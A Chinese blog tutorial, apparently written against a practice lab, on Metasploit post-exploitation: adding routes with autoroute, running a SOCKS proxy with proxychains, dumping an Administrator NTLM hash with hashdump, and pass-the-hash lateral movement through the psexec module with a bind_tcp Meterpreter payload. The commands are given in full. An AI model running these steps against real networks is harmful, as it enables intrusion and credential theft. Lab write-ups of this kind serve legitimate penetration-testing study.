metasploit后渗透之进阶知识

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF后渗透之进阶知识

获取信息

当我们获取了一个shell后,通常会遇到跨路由访问,这个时候我们就需要使用MSF来建立路由以及socks连接搭建隧道以便于我们的通信:
从这里看出是有两张网卡的:
在这里插入图片描述
虽然在我们的MSF中是可以对这个内网10段进行访问的,但我们在外面是并不能进行访问的:
在这里插入图片描述
在这里插入图片描述

建立路由

所以为了让外面也能同样进行访问,便于我们的渗透测试,所以需要建立路由,然后建立socks通道利用工具来进行代理访问:

run get_local_subnets #获取网卡信息
run autoroute -s 10.10.10.0/24 #添加路由10段
run autoroute -p #查看路由情况

在这里插入图片描述

隧道建立

建立socks5隧道:

search socks #查看socks 模块
use auxiliary/server/socks_proxy #切换到这个模块

这里的信息,VERSION SRVHOST不需要修改,SRVPORT如果修改,那么在隧道文件中也需要随之进行修改,可使用默认1080端口
在这里插入图片描述
修改隧道文件:

vim /etc/proxychains4.conf

在这里插入图片描述
使用proxychains4工具来代理:

proxychains4 nmap 10.10.10.138 -sT -Pn -A -p 445

在这里插入图片描述

内网横向

这样我们就可以从外面访问到10.10.10.138
当我们在跳板机上通过hashdump查到了hash,我们就可以利用psexec这个模块来进行攻击,来探测密码是否一致,如果一致,那么我们就可以扩大了内网控制权,实现内网横向:
首先获取hash:

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b:::

在这里插入图片描述
然后使用模块进行攻击:
这里必须使用正向连接:

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp #正向连接
set RHOST 10.10.10.138 #被攻击机地址
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b 
show options #查看信息

在这里插入图片描述
虽然我们已经建立了路由,但并没有在msf中设置全局代理,所以是无法攻击成功的。

setg Proxies socks5:192.168.1.6:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。

成功反弹:
在这里插入图片描述

当如果有多网段,那么我们也同样可以通过添加路由的方式,来进行访问。

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值